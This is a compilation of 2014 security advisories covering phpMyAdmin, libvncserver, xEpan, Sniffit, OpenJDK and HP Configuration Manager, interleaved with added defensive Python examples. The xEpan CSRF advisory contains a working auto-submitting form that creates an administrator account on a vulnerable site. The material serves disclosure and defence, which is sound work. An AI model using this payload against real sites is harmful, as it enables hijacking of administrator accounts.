[ MDVSA-2014:228 ] phpmyadmin
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2014:228
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : phpmyadmin
 Date    : November 26, 2014
 Affected: Business Server 1.0
 _______________________________________________________________________

 Problem Description:

 Multiple vulnerabilities have been discovered and corrected in phpmyadmin:

 * Multiple XSS vulnerabilities (CVE-2014-8958).
 * Local file inclusion vulnerability (CVE-2014-8959).
 * XSS vulnerability in error reporting functionality (CVE-2014-8960).
 * Leakage of line count of an arbitrary file (CVE-2014-8961).

 This upgrade provides the latest phpmyadmin version (4.2.12) to address
 these vulnerabilities.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8958
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8959
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8960
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8961
 http://sourceforge.net/p/phpmyadmin/news/
 http://www.phpmyadmin.net/home_page/security/PMASA-2014-13.php
 http://www.phpmyadmin.net/home_page/security/PMASA-2014-14.php
 http://www.phpmyadmin.net/home_page/security/PMASA-2014-15.php
 http://www.phpmyadmin.net/home_page/security/PMASA-2014-16.php
 _______________________________________________________________________

 Updated Packages:

 Mandriva Business Server 1/X86_64:
 a26cba13ad8856065de5ae22b227a412  mbs1/x86_64/phpmyadmin-4.2.12-1.mbs1.noarch.rpm
 dd54c97cc8270cc791332c1568859024  mbs1/SRPMS/phpmyadmin-4.2.12-1.mbs1.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFUdY/pmqjQ0CJFipgRAjsEAKDZeZaGjzJj8qryzSNnu1owQUqfxACg7Pr/
FBJNaxzlv6CW2wqzHnt8UGo=
=YOT0
-----END PGP SIGNATURE-----
Cross-Site Request Forgery (CSRF) in xEpan
Advisory ID: HTB23240
Product: xEpan
Vendor: Xavoc Technocrats Pvt. Ltd.
Vulnerable Version(s): 1.0.1 and probably prior
Tested Version: 1.0.1
Advisory Publication: October 22, 2014 [without technical details]
Vendor Notification: October 22, 2014
Public Disclosure: November 26, 2014
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2014-8429
Risk Level: Medium
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Not Fixed
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in xEpan, which can be exploited to compromise a vulnerable web site.

1) Cross-Site Request Forgery (CSRF) in xEpan: CVE-2014-8429

The vulnerability exists due to insufficient validation of the HTTP request origin when creating new user accounts. A remote unauthenticated attacker can trick a logged-in administrator into visiting a malicious page with a CSRF exploit, create a new account with administrative privileges and get total control over the vulnerable website.

A simple CSRF exploit below creates an administrative account with username "immuniweb" and password "password":

<form action="http://[host]/?page=owner/users&web_owner_users_crud_virtualpage=add&submit=web_web_owner_users_crud_virtualpage_form" method="post" name="main">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_name" value="name">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_email" value="em...@email.com">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_username" value="immuniweb">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_password" value="password">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_created_at" value="21/10/2014">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_type" value="100">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_is_active" value="1">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_activation_code" value="">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_last_login_date" value="">
<input type="hidden" name="ajax_submit" value="form_submit">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>

-----------------------------------------------------------------------------------------------

Solution:

Currently we are not aware of any official solution for this vulnerability.

Disclosure timeline:
2014-10-22 Vendor notified via several emails.
2014-10-22 Vendor denies vulnerability.
2014-11-06 Vulnerability is confirmed in the latest version of xEpan 1.0.4 which was released on the 2nd of November (we initially suspected a silent fix).
2014-11-06 Vulnerability confirmed in 1.0.4 as well. Vendor notified about the problem once again.
2014-11-10 Fix requested via several emails.
2014-11-17 Fix requested via several emails.
2014-11-24 Fix requested via several emails.
2014-11-24 Vulnerability still exists in latest version 1.0.4.1 which was released on November 20.
2014-11-26 Public disclosure.

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23240 - https://www.htbridge.com/advisory/HTB23240 - Cross-Site Request Forgery (CSRF) in xEpan.
[2] xEpan - http://www.xepan.org/ - xEpan is an open source content management system (CMS) with Drag & Drop, bootstrap and live text editing.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
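The advisory's root cause is that the account-creation handler accepts any POST carrying the administrator's cookie, whatever page submitted it. The following is an added example, not xEpan's code, showing the two server-side checks whose absence makes the forged form above work: a request-origin check (Origin/Referer against the site's own origin) and a per-session synchronizer token that a cross-site page cannot read. `Request`, `Session`, `SITE_ORIGIN` and the in-memory `USERS` store are simplified stand-ins constructed here; the form field names mirror the PoC only for illustration.

```python
# Added example (not xEpan's code): the two server-side checks whose absence
# the advisory describes, applied to an account-creation endpoint.
# Request/Session are simplified stand-ins constructed here; SITE_ORIGIN and
# the form field names (mirroring the advisory's PoC) are assumptions.
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

SITE_ORIGIN = "http://cms.example"  # assumed origin of the protected site
USERNAME_FIELD = "web_web_owner_users_crud_virtualpage_form_username"
TYPE_FIELD = "web_web_owner_users_crud_virtualpage_form_type"


@dataclass
class Session:
    user_id: int
    is_admin: bool
    # Unguessable per-session token; the site's own pages embed it in their forms.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    method: str
    headers: Dict[str, str]
    form: Dict[str, str]
    session: Optional[Session] = None  # the session the browser's cookie resolves to


class CsrfRejected(Exception):
    pass


def _origin_of(url: str) -> str:
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()


def check_request_origin(req: Request) -> None:
    """Reject state-changing requests whose Origin/Referer is not our site.
    Browsers attach Origin (or at least Referer) to cross-site form posts, so a
    forged POST arrives tagged with the attacker page's origin. A request with
    neither header is treated as untrusted for a state change."""
    origin = req.headers.get("Origin")
    if origin is None and req.headers.get("Referer"):
        origin = req.headers["Referer"]
    if origin is None or _origin_of(origin) != _origin_of(SITE_ORIGIN):
        raise CsrfRejected(f"untrusted origin: {origin!r}")


def check_csrf_token(req: Request) -> None:
    """Require the session's synchronizer token in the form body; a cross-site
    page cannot read it, so it cannot forge it. Compare in constant time."""
    submitted = req.form.get("csrf_token", "")
    expected = req.session.csrf_token if req.session else ""
    if not expected or not hmac.compare_digest(submitted, expected):
        raise CsrfRejected("missing or invalid CSRF token")


USERS: Dict[str, Dict[str, object]] = {}


def create_user(req: Request) -> Dict[str, object]:
    """Protected handler: method, authentication, origin and token checks all
    precede the write."""
    if req.method != "POST":
        raise CsrfRejected("state change requires POST")
    if req.session is None or not req.session.is_admin:
        raise PermissionError("admin session required")
    check_request_origin(req)
    check_csrf_token(req)
    username = req.form[USERNAME_FIELD]
    user = {"username": username, "type": int(req.form.get(TYPE_FIELD, "0"))}
    USERS[username] = user
    return user


def forged_request(admin: Session) -> Request:
    """A cross-site auto-submitted form like the advisory's PoC: the admin's
    cookie rides along (session attached), but the browser reports the
    attacker page's origin and the token is absent."""
    return Request("POST",
                   {"Origin": "http://attacker.example",
                    "Referer": "http://attacker.example/page.html"},
                   {USERNAME_FIELD: "immuniweb", TYPE_FIELD: "100"},
                   session=admin)


def legitimate_request(admin: Session) -> Request:
    """The same form submitted from the site's own page, carrying the token."""
    return Request("POST", {"Origin": SITE_ORIGIN},
                   {USERNAME_FIELD: "newuser", TYPE_FIELD: "1",
                    "csrf_token": admin.csrf_token},
                   session=admin)


def demo() -> Tuple[bool, bool]:
    """Returns (forged request succeeded, legitimate request succeeded)."""
    admin = Session(user_id=1, is_admin=True)
    try:
        create_user(forged_request(admin))
        forged_ok = True
    except CsrfRejected:
        forged_ok = False
    legit_ok = create_user(legitimate_request(admin))["username"] == "newuser"
    return forged_ok, legit_ok


if __name__ == "__main__":
    print(demo())  # (False, True)
```

Either check alone would stop the PoC; keeping both covers the cases where one is unavailable (a privacy proxy that strips Referer, or a token that leaks through a separate XSS), and neither depends on the page the form was rendered on being the one that submits it.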
CVE-2014-5439 - Root shell on Sniffit [with exploit]
CVE-2014-5439 - Root shell on Sniffit

Sniffit is a packet sniffer and monitoring tool.

The attacker can create a specially-crafted sniffit configuration file,
which is able to bypass all three protection mechanisms:

- Non-eXecutable bit NX
- Stack Smashing Protector SSP
- Address Space Layout Randomisation ASLR

and execute arbitrary code with root privileges.

Exploit, fix and discussion in:
http://hmarco.org/bugs/CVE-2014-5439-sniffit_0.3.7-stack-buffer-overflow.html

Regards,
Hector Marco.

http://hmarco.org
Cybersecurity researcher at: http://cybersecurity.upv.es/
[ MDVSA-2014:229 ] libvncserver
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2014:229
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : libvncserver
 Date    : November 26, 2014
 Affected: Business Server 1.0
 _______________________________________________________________________

 Problem Description:

 Updated libvncserver packages fix security vulnerabilities:

 A malicious VNC server can trigger incorrect memory management handling
 by advertising a large screen size parameter to the VNC client. This
 would result in multiple memory corruptions and could allow remote code
 execution on the VNC client (CVE-2014-6051, CVE-2014-6052).

 A malicious VNC client can trigger multiple DoS conditions on the VNC
 server by advertising a large screen size, ClientCutText message length
 and/or a zero scaling factor parameter (CVE-2014-6053, CVE-2014-6054).

 A malicious VNC client can trigger multiple stack-based buffer overflows
 by passing long file and directory names and/or attributes (FileTime)
 when using the file transfer message feature (CVE-2014-6055).

 Additionally libvncserver has been built against the new system minilzo
 library which is also being provided with this advisory.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6051
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6052
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6053
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6054
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6055
 http://advisories.mageia.org/MGASA-2014-0397.html
 _______________________________________________________________________

 Updated Packages:

 Mandriva Business Server 1/X86_64:
 4d938f964a86df6c1fb2aad9342db1e3  mbs1/x86_64/lib64lzo2_2-2.08-1.1.mbs1.x86_64.rpm
 676ed246f1587fb815620e42a2e64e9a  mbs1/x86_64/lib64lzo-devel-2.08-1.1.mbs1.x86_64.rpm
 d04fc1fb9b16142be0111f5efb276967  mbs1/x86_64/lib64minilzo0-2.08-1.1.mbs1.x86_64.rpm
 84f52d51b3a28e5eecd8b0f7dd3c3b65  mbs1/x86_64/lib64vncserver0-0.9.9-1.mbs1.x86_64.rpm
 50d5bf0cdff71f9773d07bfee2804eaf  mbs1/x86_64/lib64vncserver-devel-0.9.9-1.mbs1.x86_64.rpm
 70da4fa0a7eb955f45ed1fcd6fd4ca19  mbs1/x86_64/linuxvnc-0.9.9-1.mbs1.x86_64.rpm
 da9cbd99e5f15bbe8a0185e044b60c13  mbs1/SRPMS/liblzo-2.08-1.1.mbs1.src.rpm
 6cf01a7cb6d388558f73d059340ed3da  mbs1/SRPMS/libvncserver-0.9.9-1.mbs1.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFUdetlmqjQ0CJFipgRAtlsAJ9r8QqdTvbKu4NxWu5NjuMprs3u9QCfXHiW
WAB/W3mvRmbb1VP4c88JjTI=
=Yn8M
-----END PGP SIGNATURE-----
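Three of the issues in this advisory share one shape: a peer-supplied size field (framebuffer dimensions, ClientCutText length, scale factor) reaches an allocation, a loop bound or a divisor before anyone checks it. The following added example, which is not libvncserver's code, parses the three RFB messages involved and applies the bounds checks a defender would want in front of that arithmetic. Message layouts follow RFB 3.8 (SetScale is the UltraVNC extension, message type 8); the `MAX_*` caps are assumed policy values, and the sample messages, including the hostile ones, are constructed inline.

```python
# Added example (not libvncserver's code): bounds checks on the size-bearing
# fields of the RFB messages the advisory names, applied before any allocation
# or arithmetic. Layouts follow RFB 3.8 (SetScale is the UltraVNC extension,
# message type 8); the MAX_* caps are assumed policy values, and the sample
# messages are constructed here.
import struct
from typing import Dict, Optional

MAX_DIM = 8192                   # assumed cap on framebuffer width/height
MAX_FB_BYTES = 64 * 1024 * 1024  # assumed cap on framebuffer allocation
MAX_CUT_TEXT = 1024 * 1024       # assumed cap on ClientCutText payload
MAX_NAME = 256                   # assumed cap on desktop name length


class RfbProtocolError(ValueError):
    pass


def parse_server_init(data: bytes) -> Dict[str, object]:
    """ServerInit (server -> client): width U16, height U16, PIXEL_FORMAT (16 bytes),
    name-length U32, name. A malicious server can advertise 65535x65535 at 32 bpp,
    whose byte count overflows a 32-bit product; check before allocating."""
    if len(data) < 24:
        raise RfbProtocolError("short ServerInit")
    width, height, bpp = struct.unpack(">HHB", data[:5])
    (name_len,) = struct.unpack(">I", data[20:24])
    if bpp not in (8, 16, 32):
        raise RfbProtocolError(f"unsupported bits-per-pixel {bpp}")
    # Python ints do not wrap, so the overflow a C implementation would
    # suffer must be detected explicitly against the 32-bit product.
    fb_bytes = width * height * (bpp // 8)
    if fb_bytes > 0xFFFFFFFF:
        raise RfbProtocolError("framebuffer size overflows 32-bit arithmetic")
    if not (0 < width <= MAX_DIM and 0 < height <= MAX_DIM) or fb_bytes > MAX_FB_BYTES:
        raise RfbProtocolError(f"framebuffer {width}x{height}@{bpp} outside policy")
    if name_len > MAX_NAME or len(data) < 24 + name_len:
        raise RfbProtocolError("bad desktop name length")
    return {"width": width, "height": height, "bpp": bpp, "fb_bytes": fb_bytes,
            "name": data[24:24 + name_len].decode("latin-1")}


def parse_client_cut_text(data: bytes) -> bytes:
    """ClientCutText (client -> server): type U8 = 6, 3 pad bytes, length U32, text.
    Cap the declared length and never trust it beyond what was actually received."""
    if len(data) < 8 or data[0] != 6:
        raise RfbProtocolError("not a ClientCutText message")
    (length,) = struct.unpack(">I", data[4:8])
    if length > MAX_CUT_TEXT:
        raise RfbProtocolError(f"cut text length {length} exceeds cap")
    if len(data) - 8 < length:
        raise RfbProtocolError("cut text truncated")
    return data[8:8 + length]


def parse_set_scale(data: bytes) -> int:
    """SetScale (UltraVNC extension): type U8 = 8, scale U8, 2 pad bytes.
    A zero scale would later be used as a divisor; reject it here."""
    if len(data) < 4 or data[0] != 8:
        raise RfbProtocolError("not a SetScale message")
    scale = data[1]
    if scale == 0:
        raise RfbProtocolError("zero scaling factor")
    return scale


# --- constructed sample messages ------------------------------------------
def build_server_init(width: int, height: int, bpp: int = 32, name: bytes = b"demo") -> bytes:
    # PIXEL_FORMAT: bpp, depth, big-endian, true-colour, r/g/b max, r/g/b shift, 3 pad
    pixel_format = struct.pack(">BBBBHHHBBB3x", bpp, 24, 0, 1, 255, 255, 255, 16, 8, 0)
    return struct.pack(">HH", width, height) + pixel_format + struct.pack(">I", len(name)) + name


def build_client_cut_text(text: bytes, claimed_len: Optional[int] = None) -> bytes:
    n = len(text) if claimed_len is None else claimed_len   # claimed_len lets us lie
    return struct.pack(">B3xI", 6, n) + text


def demo() -> Dict[str, str]:
    """Classify benign and hostile messages as 'ok' or 'rejected'."""
    cases = {
        "benign_init":  lambda: parse_server_init(build_server_init(1024, 768)),
        "huge_init":    lambda: parse_server_init(build_server_init(65535, 65535)),
        "zero_init":    lambda: parse_server_init(build_server_init(0, 480)),
        "benign_cut":   lambda: parse_client_cut_text(build_client_cut_text(b"hello")),
        "huge_cut":     lambda: parse_client_cut_text(build_client_cut_text(b"x", 0xFFFFFFFF)),
        "benign_scale": lambda: parse_set_scale(bytes([8, 2, 0, 0])),
        "zero_scale":   lambda: parse_set_scale(bytes([8, 0, 0, 0])),
    }
    out = {}
    for label, fn in cases.items():
        try:
            fn()
            out[label] = "ok"
        except RfbProtocolError:
            out[label] = "rejected"
    return out


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:14s} {v}")
```

The ordering inside `parse_server_init` is deliberate: the overflow test runs on the full-precision product before the policy caps, so a C port that computes `width * height * bytes_per_pixel` in a 32-bit type can be given the same check as an explicit `width > UINT32_MAX / height / bpp` guard rather than relying on the caps alone.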
[SECURITY] [DSA 3077-1] openjdk-6 security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-3077-1                   secur...@debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
November 26, 2014                      http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : openjdk-6
CVE ID         : CVE-2014-6457 CVE-2014-6502 CVE-2014-6504 CVE-2014-6506
                 CVE-2014-6511 CVE-2014-6512 CVE-2014-6517 CVE-2014-6519
                 CVE-2014-6531 CVE-2014-6558

Several vulnerabilities have been discovered in OpenJDK, an
implementation of the Oracle Java platform, resulting in the execution
of arbitrary code, information disclosure or denial of service.

For the stable distribution (wheezy), these problems have been fixed in
version 6b33-1.13.5-2~deb7u1.

We recommend that you upgrade your openjdk-6 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBAgAGBQJUdiUoAAoJEBDCk7bDfE42LNEQAK4tVOH/Y6Rgc7psnAB7haNH
gG4sTVa+oBUqSxopN/JODAJzDrpEUCrHTiBBnj6PFReW7ab8rOyv5LNxq9qkq5D8
W1iFq1mVuSXc7BKGWCu4TMmZVc9Tkvp8mhsvJVxEorv0Q+q3+3ESrSZ97s06+Zh7
nqZWcihs4M2RtshYl8y6nFAfFN8s12xJ9xECECihSEP+TnRFwYlERND1pXXrzhUX
P1VUgw5jXRD7DUoAUiIf+EIU4J4bF6NI51Eh+mR4mJAZLiNtVMtKkA1c6kusda/w
ZDN0hjB8sMgGWP4dIxthYQV1ux4mEAtDzvf427l2b4Zuc5a6WCzcZEvkJ7QxQFlx
YbT29bNWigBsu3WH1Etpj5GWDxISRQVW+wWsJHXA18d5dCti00hAnjbpVZbPkkUJ
B05LNvt7TBzqWWKa416BQDDFy/n/pFn0EFUR6/HCTBpzqBqWOSrqZgjzX5Dvnbd7
YnPH0f9LsU/ir0u57tynmzyApNEW+YmRmAr/4CCM6asvKzPZWrVNFwUxGHE/e+lI
uZ0gWvq7Vr0RyYmFeZwIG+sE1HJvx8rFgbZ0DnLglyrD3cgg5DJ0inNZdHCllfJo
6ennGTgsTsdArJMProwVGlB2uGwW3EZRbJyz5Ol1jAtPLkrIGT4ujW5d7yfduout
voLnaEPtqnXoPlEz9A0c
=GU24
-----END PGP SIGNATURE-----
[security bulletin] HPSBGN03202 rev.1 - HP CMS: Configuration Manager running OpenSSL, Remote Disclosure of Information
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04507568

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04507568
Version: 1

HPSBGN03202 rev.1 - HP CMS: Configuration Manager running OpenSSL, Remote Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2014-11-26
Last Updated: 2014-11-26

Potential Security Impact: Remote disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP CMS: Configuration Manager running OpenSSL. This is the SSLv3 vulnerability known as Padding Oracle on Downgraded Legacy Encryption, also known as POODLE, which could be exploited remotely to allow disclosure of information.

References: CVE-2014-3566 (SSRT101842)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Configuration Manager all supported versions.

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
CVE-2014-3566    (AV:N/AC:M/Au:N/C:P/I:N/A:N)       4.3
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION
HP has made the following instructions available to resolve the vulnerability in HP Configuration Manager:
https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetsearch/document/KM01235504

HISTORY
Version:1 (rev.1) - 26 November 2014 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact the normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.19 (GNU/Linux)

iEYEARECAAYFAlR2CL4ACgkQ4B86/C0qfVmxSwCfUGcNArFjaj69xvwAX/W5McUc
mgcAniGIrXK6xEo5rnsfXvI44f3qY62R
=NiLb
-----END PGP SIGNATURE-----